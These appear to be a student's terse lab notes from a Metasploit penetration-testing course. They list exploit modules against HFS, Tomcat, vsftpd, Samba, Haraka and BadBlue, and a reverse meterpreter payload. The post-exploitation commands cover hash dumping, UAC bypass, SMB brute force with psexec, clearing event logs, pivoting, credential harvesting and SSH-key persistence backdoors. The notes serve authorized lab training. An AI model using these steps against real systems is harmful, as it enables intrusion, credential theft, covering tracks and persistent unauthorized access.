Metasploit Framework (MSF)
- windows http file server
- use msf module
exploit/windows/http/rejetto_hfs_exec
- use msf module
- windows java web server
- exploit the tomcat
exploit/multi/http/tomcat_jsp_upload_bypass
- exploit the tomcat
- vulnerable ftp server
- vsftpd is backdoored
exploit/unix/ftp/vsftpd_234_backdoor
- vsftpd is backdoored
- vulnerable file sharing service
- exploit the samba server
exploit/linux/samba/is_known_pipename
- exploit the samba server
- vulnerable ssh server
- msf module
auxiliary/scanner/ssh/libssh_auth_bypass
- msf module
- vulnerable smtp server
- haraka mail server
exploit/linux/smtp/haraka, setSRVPORT 9898email_to root@attackdefense.testpayload linux/x64/meterpreter_reverse_http
- haraka mail server
- meterpreter basics
- check the php file and realise xdebug enabled, use
exploit/unix/http/xdebug_unauth_exec - available commands
pwdlslpwdllseditcatdownloadunziprmchecksumgetenv PATHsearch -d /usr/bin -f *ckdo*lcdupload
- check the php file and realise xdebug enabled, use
- upgrading shells to meterpreter
- exploit samba again
exploit/linux/samba/is_known_pipenameto get shell, upgrade to meterpreter withpost/multi/manage/shell_to_meterpreter
- exploit samba again
- windows post exploitation
- exploit hfs first to get shell
exploit/windows/http/rejetto_hfs_exec - post exploitation using
post/windows/gather/win_privspost/windows/gather/enum_logged_on_userspost/windows/gather/checkvmpost/windows/gather/enum_applicationspost/windows/gather/enum_computerspost/windows/gather/enum_shares
- exploit hfs first to get shell
- uac bypass, msf memory injection
- exploit the hsf server
exploit/windows/http/rejetto_hfs_exec, migrate to privileged processps -S explorer.exemigrate 2124getsystem - to use the memory injection, background the session and use
exploit/windows/local/bypassuac_injection, migrate again and you can dump hashesps -S lsass.exemigrate 484hashdump
- exploit the hsf server
- exploiting smb with psexec
- msf module to bruteforce
auxiliary/scanner/smb/smb_login, setUSER_FILEPASS_FILERHOSTSandVERBOSE - msf module to gain access
exploit/windows/smb/psexec, setRHOSTSSMBUserandSMBPass
- msf module to bruteforce
- windows enable remote desktop
- exploit the badblue
exploit/windows/http/badblue_passthru - enable the rdp post exploit
use post/windows/manage/enable_rdp
- exploit the badblue
- clearing windows event logs
- its just the
clearev
- its just the
- pivoting
- exploit the hfs
use exploit/windows/http/rejetto_hfs_exec, use the autorouterun autoroute -s 10.0.16.0/20 - port forwarding in metasploit with
portfwd add -l 1234 -p 80 -r demo2.ine.localand check the list withportfwd list - exploit the badblue on the internal server
exploit/windows/http/badblue_passthru
- exploit the hfs
- linux post exploitation lab I
- exploit using
use exploit/linux/samba/is_known_pipename - gather configuration files
use post/linux/gather/enum_configs - gather environmental variables
use post/multi/gather/env - gather network settings
use post/linux/gather/enum_network - check system protections
use post/linux/gather/enum_protections - gather system info
use post/linux/gather/enum_system - check if inside container
use post/linux/gather/checkcontainer - check if inside vm
use post/linux/gather/checkvm - check user history
use post/linux/gather/enum_users_history - spawn other types of shell
use post/multi/manage/system_session - download file using meterpreter
use post/linux/manage/download_exec
- exploit using
- privilege escalation, rootkit scanner
- its a vulnerable rootkit scanner called chkrootkit found using
ps -aux, exploit usinguse exploit/unix/local/chkrootkit
- its a vulnerable rootkit scanner called chkrootkit found using
- linux post exploitation lab II
- gather ssh credentials
use post/multi/gather/ssh_creds - gather docker credentials
use post/multi/gather/docker_creds - dump hashes
use post/linux/gather/hashdump - extract ecrypt folder which may have credentials
use post/linux/gather/ecryptfs_creds - extract wifi credentials
use post/linux/gather/enum_psk - extract xchat
use post/linux/gather/enum_xchat - extract phpmyadmin
use post/linux/gather/phpmyadmin_credsteal - extract pptp tunneling protocol using
use post/linux/gather/pptpd_chap_secrets - create sshkey backdoor
use post/linux/manage/sshkey_persistence
- gather ssh credentials
- establishing persistence on linux
- create sshkey backdoor
use post/linux/manage/sshkey_persistence
- create sshkey backdoor
- port scanning and enumeration with armitage
- GUI for metasploit, click
open shell
- GUI for metasploit, click
- exploitation and post exploitation with armitage
- GUI for metasploit, open meterpreter and dump hashes